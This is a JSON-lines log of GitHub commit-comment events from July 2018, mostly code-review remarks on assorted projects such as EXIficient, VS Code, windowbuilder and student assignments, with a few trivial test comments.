{"id":"7948286939","type":"CommitCommentEvent","actor":{"login":"buko"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29667174,"position":34,"line":300,"path":"src/test/java/com/siemens/ct/exi/main/api/stream/StAXCoderTestCase.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-11T07:35:09Z","updated_at":"2018-07-11T07:35:09Z","author_association":"NONE","body":"It sounds like we're both confused ;)\r\n\r\nI was reading over your code and I was worried that you were returning the size of the namespaceContext and not the namespaceCount. "}},"created_at":"2018-07-11T07:35:09Z"}
{"id":"7948293216","type":"CommitCommentEvent","actor":{"login":"shivavelu"},"repo":{"name":"shivavelu/SfbayProject"},"payload":{"comment":{"id":29667181,"position":null,"line":null,"path":null,"commit_id":"c306e36c189e867ae95bd7133d2b2185e09dfe4e","created_at":"2018-07-11T07:36:32Z","updated_at":"2018-07-11T07:36:32Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-11T07:36:32Z"}
{"id":"7948298320","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"arm-facts/arm-basics.com"},"payload":{"comment":{"id":29667190,"position":34,"line":39,"path":"index.md","commit_id":"3ecd43ea4058f0f244948fba19ada620f1450b63","created_at":"2018-07-11T07:37:41Z","updated_at":"2018-07-11T07:37:41Z","author_association":"NONE","body":"Shouldn't that read *\"It's true **the** RISC-V ecosystem **is** weaker than ARM’s right now, but is growing much faster.\"*?"}},"created_at":"2018-07-11T07:37:41Z"}
{"id":"7948307563","type":"CommitCommentEvent","actor":{"login":"unpete"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29667207,"position":38,"line":2981,"path":"dist/windowbuilder.js","commit_id":"225b3f32d74945d0fce90032ec59a488cc529e94","created_at":"2018-07-11T07:39:49Z","updated_at":"2018-07-11T07:39:49Z","author_association":"MEMBER","body":"Здесь должно быть `side_count === 4`\r\nПрямоугольные незамкнутые считаем непрямоугольными"}},"created_at":"2018-07-11T07:39:49Z"}
{"id":"7948309107","type":"CommitCommentEvent","actor":{"login":"danielpeintner"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29667212,"position":21,"line":435,"path":"src/main/java/com/siemens/ct/exi/main/api/stream/StAXDecoder.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-11T07:40:10Z","updated_at":"2018-07-11T07:40:10Z","author_association":"CONTRIBUTOR","body":"I see. What you are saying is that namespaceContext contains ALL possible NS declarations while namespaceCount just the ones actually declared on this element.\r\n\r\nIf this is true the current code is wrong. The namespaceContext with the current code returns also just the ones declared in this context _without_ the NS declarations that happened in the hierarchy above.. --> yet another fix needed"}},"created_at":"2018-07-11T07:40:10Z"}
{"id":"7948314773","type":"CommitCommentEvent","actor":{"login":"mingwandroid"},"repo":{"name":"AnacondaRecipes/gobject-introspection-feedstock"},"payload":{"comment":{"id":29667223,"position":null,"line":null,"path":null,"commit_id":"51f2dc9e16e11f45cab6c7a803adc63e7951053e","created_at":"2018-07-11T07:41:26Z","updated_at":"2018-07-11T07:41:26Z","author_association":"COLLABORATOR","body":"I have had no problem with it. In fact it was done for gstreamer AFAIR."}},"created_at":"2018-07-11T07:41:26Z"}
{"id":"7948315059","type":"CommitCommentEvent","actor":{"login":"RapeFactory"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29667226,"position":38,"line":2981,"path":"dist/windowbuilder.js","commit_id":"225b3f32d74945d0fce90032ec59a488cc529e94","created_at":"2018-07-11T07:41:29Z","updated_at":"2018-07-11T07:41:29Z","author_association":"CONTRIBUTOR","body":"PR делаю?"}},"created_at":"2018-07-11T07:41:29Z"}
{"id":"7948325454","type":"CommitCommentEvent","actor":{"login":"suguolun"},"repo":{"name":"suguolun/HELLO-WORLD"},"payload":{"comment":{"id":29667258,"position":null,"line":null,"path":null,"commit_id":"3bb7b51d67d9f6ba483126bd995935158ac06dfc","created_at":"2018-07-11T07:43:50Z","updated_at":"2018-07-11T07:43:50Z","author_association":"OWNER","body":"hello world \r\nmy name is suguolun ,i come from chinese.iwant to become a great sciense.i hope i own greater wish ,so i will make great progress."}},"created_at":"2018-07-11T07:43:50Z"}
{"id":"7948330474","type":"CommitCommentEvent","actor":{"login":"vector-of-bool"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29667272,"position":45,"line":73,"path":"src/vs/workbench/api/node/extHostProgress.ts","commit_id":"098cf01a2e35d00206ec29c4e95cfc7d308afdc6","created_at":"2018-07-11T07:44:56Z","updated_at":"2018-07-11T07:44:56Z","author_association":"NONE","body":"I did look at a later commit. The `else` branch is an assignment, not an increment. Which may or may not be intentional? Either way, I can wait for your commit in an Insider's build and see if it fixes my troubles. Thanks!"}},"created_at":"2018-07-11T07:44:56Z"}
{"id":"7948333329","type":"CommitCommentEvent","actor":{"login":"diemoschwarz"},"repo":{"name":"Ircam-RnD/catart-mubu"},"payload":{"comment":{"id":29667280,"position":null,"line":null,"path":null,"commit_id":"bfc65991f853bfe905ffada0bb636a1a3a133f2e","created_at":"2018-07-11T07:45:31Z","updated_at":"2018-07-11T07:45:31Z","author_association":"MEMBER","body":"in catart-by-mubu-trigger.3.maxpat"}},"created_at":"2018-07-11T07:45:31Z"}
{"id":"7948334376","type":"CommitCommentEvent","actor":{"login":"ricemilk456"},"repo":{"name":"ricemilk456/Software"},"payload":{"comment":{"id":29667281,"position":null,"line":null,"path":null,"commit_id":"4c6d5fba9f17e8014524b5540bfc3250854b5c51","created_at":"2018-07-11T07:45:43Z","updated_at":"2018-07-11T07:45:43Z","author_association":"OWNER","body":"AAAAA"}},"created_at":"2018-07-11T07:45:43Z"}
{"id":"7948338157","type":"CommitCommentEvent","actor":{"login":"davismj"},"repo":{"name":"haimavni/gbs"},"payload":{"comment":{"id":29667290,"position":5,"line":19,"path":"src/_app.desktop.scss","commit_id":"e7d489b55e7659371b7c16985a0ff30be925e3be","created_at":"2018-07-11T07:46:30Z","updated_at":"2018-07-11T07:46:30Z","author_association":"COLLABORATOR","body":"@haimavni The problem with this is it causes layout issues, even near 1200px. Notice the loading spinner is not showing in this screen. If you want bigger text in the navbar, we gotta make room by cutting things elsewhere.\r\n\r\n![image](https://user-images.githubusercontent.com/3845823/42557494-b4f59c34-8529-11e8-9b1a-73f51adf3d0d.png)\r\n"}},"created_at":"2018-07-11T07:46:30Z"}
{"id":"7948338635","type":"CommitCommentEvent","actor":{"login":"JanusJ"},"repo":{"name":"JanusJ/SpringBoot"},"payload":{"comment":{"id":29667291,"position":null,"line":null,"path":null,"commit_id":"d8efd1352b4e624242554727dc22976ea8fd8aeb","created_at":"2018-07-11T07:46:36Z","updated_at":"2018-07-11T07:46:36Z","author_association":"OWNER","body":"SpringBoot+Sping Security"}},"created_at":"2018-07-11T07:46:36Z"}
{"id":"7948340679","type":"CommitCommentEvent","actor":{"login":"GuanYue92"},"repo":{"name":"GuanYue92/hello-world"},"payload":{"comment":{"id":29667297,"position":null,"line":null,"path":null,"commit_id":"f324bf78e191b469c13940f0134a297f24ac199d","created_at":"2018-07-11T07:47:03Z","updated_at":"2018-07-11T07:47:03Z","author_association":"OWNER","body":"change the month salary"}},"created_at":"2018-07-11T07:47:03Z"}
{"id":"7948344089","type":"CommitCommentEvent","actor":{"login":"RapeFactory"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29667304,"position":38,"line":2981,"path":"dist/windowbuilder.js","commit_id":"225b3f32d74945d0fce90032ec59a488cc529e94","created_at":"2018-07-11T07:47:48Z","updated_at":"2018-07-11T07:47:48Z","author_association":"CONTRIBUTOR","body":"Не пройдет так. На трапецию или параллелограмм даст `true`, что неверно"}},"created_at":"2018-07-11T07:47:48Z"}
{"id":"7948344835","type":"CommitCommentEvent","actor":{"login":"VasekPurchart"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29667306,"position":null,"line":null,"path":null,"commit_id":"ea30584b2aa2b605e01dbca1cc30f3fb136b990a","created_at":"2018-07-11T07:47:58Z","updated_at":"2018-07-11T07:47:58Z","author_association":"CONTRIBUTOR","body":"If I remember correctly why experimenting with this like a year ago, you could end up with different installed versions when reusing vendor as opposed to a clean install. Which could then mean that the builds are no longer deterministic, because it depends on the order in which branches/PRs are built."}},"created_at":"2018-07-11T07:47:58Z"}
{"id":"7948346282","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29667309,"position":null,"line":null,"path":null,"commit_id":"a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec","created_at":"2018-07-11T07:48:17Z","updated_at":"2018-07-11T07:48:17Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-11T07:48:17Z"}
{"id":"7948352767","type":"CommitCommentEvent","actor":{"login":"einbond"},"repo":{"name":"Ircam-RnD/catart-mubu"},"payload":{"comment":{"id":29667323,"position":null,"line":null,"path":null,"commit_id":"bfc65991f853bfe905ffada0bb636a1a3a133f2e","created_at":"2018-07-11T07:49:42Z","updated_at":"2018-07-11T07:49:42Z","author_association":"COLLABORATOR","body":"file is not visible in my current clone of the repository!"}},"created_at":"2018-07-11T07:49:42Z"}
{"id":"7948354954","type":"CommitCommentEvent","actor":{"login":"davismj"},"repo":{"name":"haimavni/gbs"},"payload":{"comment":{"id":29667327,"position":8,"line":6,"path":"src/_breakpoints.scss","commit_id":"e7d489b55e7659371b7c16985a0ff30be925e3be","created_at":"2018-07-11T07:50:10Z","updated_at":"2018-07-11T07:50:10Z","author_association":"COLLABORATOR","body":"@haimavni The problem with a 1200px desktop cutoff is that the mobile view wasn't designed for 1200px so it looks terrible. Additionally, this is still a traditionally desktop / widescreen resolution, so its going to display mobile views on some desktops, and it doesn't look good.\r\n\r\n900 was selected as midpoint between a typical tablet portrait target width of 768px and a typical tablet landscape target width of 1024px. 900px has some play to it, but probably not outside the bounds of 768px and 1024px. 1200px is way too far.\r\n\r\n![image](https://user-images.githubusercontent.com/3845823/42557716-396e7742-852a-11e8-896e-8dbe6f4cc088.png)\r\n"}},"created_at":"2018-07-11T07:50:10Z"}
{"id":"7948361222","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29667335,"position":45,"line":73,"path":"src/vs/workbench/api/node/extHostProgress.ts","commit_id":"098cf01a2e35d00206ec29c4e95cfc7d308afdc6","created_at":"2018-07-11T07:51:35Z","updated_at":"2018-07-11T07:51:35Z","author_association":"MEMBER","body":"@vector-of-bool ah yeah, good catch. Will look at it again!"}},"created_at":"2018-07-11T07:51:35Z"}
{"id":"7948362539","type":"CommitCommentEvent","actor":{"login":"aradione"},"repo":{"name":"aradione/-"},"payload":{"comment":{"id":29667338,"position":null,"line":null,"path":null,"commit_id":"ee34ec6cf2fd090a4d9b42094b3df76f3381ac93","created_at":"2018-07-11T07:51:53Z","updated_at":"2018-07-11T07:51:53Z","author_association":"OWNER","body":"_"}},"created_at":"2018-07-11T07:51:53Z"}
{"id":"7948363800","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667342,"position":14,"line":41,"path":"week-08/day03/signupForm.html","commit_id":"5ee44474da7e83cd3c2c0d71a6a5ef8dd3a53718","created_at":"2018-07-11T07:52:09Z","updated_at":"2018-07-11T07:52:09Z","author_association":"NONE","body":"Please pay attention to the spaces:\r\n`<button class=\"submit\" disabled>Sign Me Up</button>`"}},"created_at":"2018-07-11T07:52:09Z"}
{"id":"7948365956","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29667344,"position":79,"line":68,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T07:52:39Z","updated_at":"2018-07-11T07:52:39Z","author_association":"OWNER","body":"I interpreted the requirements in such way that it only affects the claimback"}},"created_at":"2018-07-11T07:52:39Z"}
{"id":"7948366046","type":"CommitCommentEvent","actor":{"login":"RapeFactory"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29667345,"position":38,"line":2981,"path":"dist/windowbuilder.js","commit_id":"225b3f32d74945d0fce90032ec59a488cc529e94","created_at":"2018-07-11T07:52:40Z","updated_at":"2018-07-11T07:52:40Z","author_association":"CONTRIBUTOR","body":"Через И надо \r\n```js\r\n    return (this.side_count === 4) && !this.profiles.some((profile) => {\r\n      return !(profile.is_linear() && Math.abs(profile.angle_hor % 90) < 0.2);\r\n    });\r\n```"}},"created_at":"2018-07-11T07:52:40Z"}
{"id":"7948367055","type":"CommitCommentEvent","actor":{"login":"ojura"},"repo":{"name":"googlecartographer/cartographer"},"payload":{"comment":{"id":29667348,"position":31,"line":31,"path":"cartographer/mapping/2d/tsdf_range_data_inserter_2d.cc","commit_id":"7dfe4042782bb088ac525d18a4991e15292a2b92","created_at":"2018-07-11T07:52:54Z","updated_at":"2018-07-11T07:52:54Z","author_association":"CONTRIBUTOR","body":"@kdaun MSVC complains about this and won't compile:\r\n\r\n`error C2131: expression did not evaluate to a constant `\r\n\r\nChange to `const`?"}},"created_at":"2018-07-11T07:52:54Z"}
{"id":"7948367180","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667349,"position":4,"line":4,"path":"week-08/day03/signup.js","commit_id":"5ee44474da7e83cd3c2c0d71a6a5ef8dd3a53718","created_at":"2018-07-11T07:52:55Z","updated_at":"2018-07-11T07:52:55Z","author_association":"NONE","body":"Use single quotes"}},"created_at":"2018-07-11T07:52:55Z"}
{"id":"7948368155","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667352,"position":8,"line":8,"path":"week-08/day03/signup.js","commit_id":"5ee44474da7e83cd3c2c0d71a6a5ef8dd3a53718","created_at":"2018-07-11T07:53:09Z","updated_at":"2018-07-11T07:53:09Z","author_association":"NONE","body":";"}},"created_at":"2018-07-11T07:53:09Z"}
{"id":"7948370924","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667355,"position":5,"line":5,"path":"week-08/day03/signup.js","commit_id":"5ee44474da7e83cd3c2c0d71a6a5ef8dd3a53718","created_at":"2018-07-11T07:53:45Z","updated_at":"2018-07-11T07:53:45Z","author_association":"NONE","body":"Use single quotes everywhere."}},"created_at":"2018-07-11T07:53:45Z"}
{"id":"7948371900","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667358,"position":22,"line":22,"path":"week-08/day03/signup.js","commit_id":"5ee44474da7e83cd3c2c0d71a6a5ef8dd3a53718","created_at":"2018-07-11T07:53:57Z","updated_at":"2018-07-11T07:53:57Z","author_association":"NONE","body":";"}},"created_at":"2018-07-11T07:53:57Z"}
{"id":"7948374037","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667361,"position":45,"line":45,"path":"week-08/day03/signup.js","commit_id":"5ee44474da7e83cd3c2c0d71a6a5ef8dd3a53718","created_at":"2018-07-11T07:54:27Z","updated_at":"2018-07-11T07:54:27Z","author_association":"NONE","body":";"}},"created_at":"2018-07-11T07:54:27Z"}
{"id":"7948376563","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29667362,"position":26,"line":43,"path":"test/remittance.js","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T07:55:01Z","updated_at":"2018-07-11T07:55:01Z","author_association":"OWNER","body":"@xavierlepretre Why would you call the contract if you can use a JS library that does the same trick ? "}},"created_at":"2018-07-11T07:55:01Z"}
{"id":"7948386459","type":"CommitCommentEvent","actor":{"login":"avinash-zemoso"},"repo":{"name":"nishantns7/Java_Assignments"},"payload":{"comment":{"id":29667384,"position":4,"line":37,"path":"Assignment_1/FileSearcher.java","commit_id":"f9c684d3340e8f0382e9dcac7978b644e72f44aa","created_at":"2018-07-11T07:57:09Z","updated_at":"2018-07-11T07:57:09Z","author_association":"COLLABORATOR","body":"@nishantns7 Even if you don't explicitly throw NullPointerException wouldn't this method throw it? You should rather throw an IllegalArgumentException saying that pattern cannot be null"}},"created_at":"2018-07-11T07:57:09Z"}
{"id":"7948387358","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667386,"position":16,"line":16,"path":"week-08/day03/loginForm.html","commit_id":"f89eb871019133eb4126048f5dfb48749caf397e","created_at":"2018-07-11T07:57:21Z","updated_at":"2018-07-11T07:57:21Z","author_association":"NONE","body":"Use lowercase letters for name and id. You can use uppercase letters in the placeholder attribute, because it's for the user."}},"created_at":"2018-07-11T07:57:21Z"}
{"id":"7948387544","type":"CommitCommentEvent","actor":{"login":"diemoschwarz"},"repo":{"name":"Ircam-RnD/catart-mubu"},"payload":{"comment":{"id":29667387,"position":null,"line":null,"path":null,"commit_id":"bfc65991f853bfe905ffada0bb636a1a3a133f2e","created_at":"2018-07-11T07:57:23Z","updated_at":"2018-07-11T07:57:23Z","author_association":"MEMBER","body":"same for me, and I can't track down why it disappeared from the branch...  I'll revive it.\r\nCode variants like this can also be handled in feature branches."}},"created_at":"2018-07-11T07:57:23Z"}
{"id":"7948388744","type":"CommitCommentEvent","actor":{"login":"avinash-zemoso"},"repo":{"name":"nishantns7/Java_Assignments"},"payload":{"comment":{"id":29667390,"position":5,"line":31,"path":"Assignment_2/AlphabetCheck.java","commit_id":"f9c684d3340e8f0382e9dcac7978b644e72f44aa","created_at":"2018-07-11T07:57:38Z","updated_at":"2018-07-11T07:57:38Z","author_association":"COLLABORATOR","body":"You should rather throw an IllegalArgumentException saying that str cannot be null"}},"created_at":"2018-07-11T07:57:38Z"}
{"id":"7948390654","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667395,"position":21,"line":21,"path":"week-08/day03/loginForm.html","commit_id":"f89eb871019133eb4126048f5dfb48749caf397e","created_at":"2018-07-11T07:58:02Z","updated_at":"2018-07-11T07:58:02Z","author_association":"NONE","body":"I think there's a missing closing `>` for `input`"}},"created_at":"2018-07-11T07:58:02Z"}
{"id":"7948391602","type":"CommitCommentEvent","actor":{"login":"3499722281"},"repo":{"name":"3499722281/j49git"},"payload":{"comment":{"id":29667398,"position":null,"line":null,"path":null,"commit_id":"cf8642790bb83bd49c03296b64eddb66276b360e","created_at":"2018-07-11T07:58:15Z","updated_at":"2018-07-11T07:58:15Z","author_association":"OWNER","body":"delet"}},"created_at":"2018-07-11T07:58:15Z"}
{"id":"7948393875","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29667402,"position":102,"line":92,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T07:58:43Z","updated_at":"2018-07-11T07:58:43Z","author_association":"OWNER","body":"OK, I guess that declaring a variable doesn't occupy space, only when you do the assignment. I should have known this."}},"created_at":"2018-07-11T07:58:43Z"}
{"id":"7948397156","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667407,"position":29,"line":29,"path":"week-08/day03/loginForm.html","commit_id":"f89eb871019133eb4126048f5dfb48749caf397e","created_at":"2018-07-11T07:59:24Z","updated_at":"2018-07-11T07:59:24Z","author_association":"NONE","body":"Please use single quotes. There are missing semicolons everywhere."}},"created_at":"2018-07-11T07:59:24Z"}
{"id":"7948397621","type":"CommitCommentEvent","actor":{"login":"kdudka"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29667408,"position":null,"line":null,"path":null,"commit_id":"b560ce8f26db3af1a4f6c01cfa3ab2e2f64b33d1","created_at":"2018-07-11T07:59:30Z","updated_at":"2018-07-11T07:59:30Z","author_association":"NONE","body":"I do not think this refactoring is going to help.  The version was structured for a reason.  Translating \"1.0\" to 1 and \"2.0\" to 2 hardly classifies as improvement over status quo.  Also the original message provided exact info about the used and actually supported versions while the new message just says `\"News file has unsupported version\"` without any details.  Could you please revert this commit?"}},"created_at":"2018-07-11T07:59:30Z"}
{"id":"7948398054","type":"CommitCommentEvent","actor":{"login":"unpete"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29667409,"position":38,"line":2981,"path":"dist/windowbuilder.js","commit_id":"225b3f32d74945d0fce90032ec59a488cc529e94","created_at":"2018-07-11T07:59:36Z","updated_at":"2018-07-11T07:59:36Z","author_association":"MEMBER","body":"Что через && - понятно, но перед внесением изменений надо проверить, где этот is_rectangular используется. Может оказаться, что там ждут инверсного результата."}},"created_at":"2018-07-11T07:59:36Z"}
{"id":"7948398882","type":"CommitCommentEvent","actor":{"login":"einbond"},"repo":{"name":"Ircam-RnD/catart-mubu"},"payload":{"comment":{"id":29667410,"position":null,"line":null,"path":null,"commit_id":"bfc65991f853bfe905ffada0bb636a1a3a133f2e","created_at":"2018-07-11T07:59:47Z","updated_at":"2018-07-11T07:59:47Z","author_association":"COLLABORATOR","body":"Thanks. I like this version best, so perhaps it can just replace the others."}},"created_at":"2018-07-11T07:59:47Z"}
{"id":"7948399895","type":"CommitCommentEvent","actor":{"login":"OmarAlareeki"},"repo":{"name":"OmarAlareeki/Responsive-Funny-Text"},"payload":{"comment":{"id":29667412,"position":5,"line":6,"path":"example.html","commit_id":"4c29c532452f09fe0de41de0c86a01abc4893c1d","created_at":"2018-07-11T08:00:01Z","updated_at":"2018-07-11T08:00:01Z","author_association":"OWNER","body":"The author of responsive version."}},"created_at":"2018-07-11T08:00:01Z"}
{"id":"7948401792","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667420,"position":31,"line":23,"path":"week-08/day02/keyup.html","commit_id":"2549df436d765c6d0e1fb0a7ca0c82afaf550c09","created_at":"2018-07-11T08:00:24Z","updated_at":"2018-07-11T08:00:24Z","author_association":"NONE","body":"Use template literal."}},"created_at":"2018-07-11T08:00:24Z"}
{"id":"7948410284","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29667430,"position":101,"line":101,"path":"week-08/day02/bubbling.html","commit_id":"6264cc154383d796aa4ce06ff0bcb4e5e24e5797","created_at":"2018-07-11T08:02:09Z","updated_at":"2018-07-11T08:02:09Z","author_association":"NONE","body":"👌 "}},"created_at":"2018-07-11T08:02:09Z"}
{"id":"7948411470","type":"CommitCommentEvent","actor":{"login":"mbredif"},"repo":{"name":"peppsac/itowns2"},"payload":{"comment":{"id":29667431,"position":41,"line":299,"path":"src/Provider/PointCloudProvider.js","commit_id":"1a26cf513154fd8a5cd188ce761bc24735eac022","created_at":"2018-07-11T08:02:24Z","updated_at":"2018-07-11T08:02:24Z","author_association":"NONE","body":"points.tightbox instead?"}},"created_at":"2018-07-11T08:02:24Z"}
{"id":"7948415243","type":"CommitCommentEvent","actor":{"login":"gitsammen"},"repo":{"name":"gitsammen/Hello-World"},"payload":{"comment":{"id":29667440,"position":null,"line":null,"path":null,"commit_id":"d6fc4b0ebfb751883869d39edf15991f9e65a5c2","created_at":"2018-07-11T08:03:12Z","updated_at":"2018-07-11T08:03:12Z","author_association":"OWNER","body":"ed"}},"created_at":"2018-07-11T08:03:12Z"}
{"id":"7948417126","type":"CommitCommentEvent","actor":{"login":"Kaihatsu-Hiroto"},"repo":{"name":"Kaihatsu-Hiroto/MergeManGene"},"payload":{"comment":{"id":29667442,"position":null,"line":null,"path":null,"commit_id":"48f1bb701b64281d3ee702a0568d35c3249cf3a7","created_at":"2018-07-11T08:03:36Z","updated_at":"2018-07-11T08:03:36Z","author_association":"OWNER","body":"【Slack】連携"}},"created_at":"2018-07-11T08:03:36Z"}
{"id":"7948417200","type":"CommitCommentEvent","actor":{"login":"simonsigre"},"repo":{"name":"certau/ir2go"},"payload":{"comment":{"id":29667443,"position":null,"line":null,"path":null,"commit_id":"9f4ab527e80d3a73239553820b386f3c4f79618c","created_at":"2018-07-11T08:03:37Z","updated_at":"2018-07-11T08:03:37Z","author_association":"NONE","body":"*bahhahahhaha* sometimes you gotta pad those asterisks. Hopefully it went through  code review ;) \n\n\n> On 11 Jul 2018, at 17:21, empressbat <notifications@github.com> wrote:\n> \n> This is great @birdman4512\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-11T08:03:37Z"}
{"id":"7948418432","type":"CommitCommentEvent","actor":{"login":"XiaoLin0815"},"repo":{"name":"metowolf/BilibiliHelper"},"payload":{"comment":{"id":29667445,"position":null,"line":null,"path":null,"commit_id":"84294d5bcbf7b5565863b2809072e1a61cfb0221","created_at":"2018-07-11T08:03:54Z","updated_at":"2018-07-11T08:03:54Z","author_association":"NONE","body":"被请喝茶了么 ((("}},"created_at":"2018-07-11T08:03:54Z"}
{"id":"7948418529","type":"CommitCommentEvent","actor":{"login":"xhawk"},"repo":{"name":"xhawk/lr-docker-compose"},"payload":{"comment":{"id":29667446,"position":null,"line":null,"path":null,"commit_id":"7be6a680e3c8245e904c10ed93e64057d4034ca2","created_at":"2018-07-11T08:03:55Z","updated_at":"2018-07-11T08:03:55Z","author_association":"OWNER","body":"Add title to readme.md"}},"created_at":"2018-07-11T08:03:55Z"}
{"id":"7948418806","type":"CommitCommentEvent","actor":{"login":"restrry"},"repo":{"name":"redux-saga/redux-saga"},"payload":{"comment":{"id":29667447,"position":12,"line":81,"path":"packages/core/src/internal/error-utils.js","commit_id":"9ed43b5e6faa6fac4b8db94362f17ed8e3d57332","created_at":"2018-07-11T08:03:59Z","updated_at":"2018-07-11T08:03:59Z","author_association":"COLLABORATOR","body":"ok. I remember that problem is not misleading stack trace. actually runtime-regenerator just re-throw error https://github.com/facebook/regenerator/blob/master/packages/regenerator-runtime/runtime.js#L558 \r\nthe problem is that after re-throwing error devtools point to the re-throwing place, not the original error source. even attempt to blackbox regenerator wouldn't help, since error has been already caught by regenerator"}},"created_at":"2018-07-11T08:03:59Z"}
{"id":"7948419153","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29667448,"position":45,"line":73,"path":"src/vs/workbench/api/node/extHostProgress.ts","commit_id":"098cf01a2e35d00206ec29c4e95cfc7d308afdc6","created_at":"2018-07-11T08:04:04Z","updated_at":"2018-07-11T08:04:04Z","author_association":"MEMBER","body":"@vector-of-bool I am feeling not so good changing this code even though it was wrong before, we did not get a report of an issue so far. So please file an issue with your bug so that I can have some steps to look at."}},"created_at":"2018-07-11T08:04:04Z"}
{"id":"7948420587","type":"CommitCommentEvent","actor":{"login":"diemoschwarz"},"repo":{"name":"Ircam-RnD/catart-mubu"},"payload":{"comment":{"id":29667449,"position":null,"line":null,"path":null,"commit_id":"bfc65991f853bfe905ffada0bb636a1a3a133f2e","created_at":"2018-07-11T08:04:23Z","updated_at":"2018-07-11T08:04:23Z","author_association":"MEMBER","body":"see also https://stackoverflow.com/a/41955317/5599230"}},"created_at":"2018-07-11T08:04:23Z"}
{"id":"7948424189","type":"CommitCommentEvent","actor":{"login":"RapeFactory"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29667453,"position":38,"line":2981,"path":"dist/windowbuilder.js","commit_id":"225b3f32d74945d0fce90032ec59a488cc529e94","created_at":"2018-07-11T08:05:11Z","updated_at":"2018-07-11T08:05:11Z","author_association":"CONTRIBUTOR","body":"С четырехсторонними контурами я работал, ожидая результата согласно лексическим правилам английского, и мои ожидания оправдывались. `прямоугольное`: `да`/`нет`"}},"created_at":"2018-07-11T08:05:11Z"}
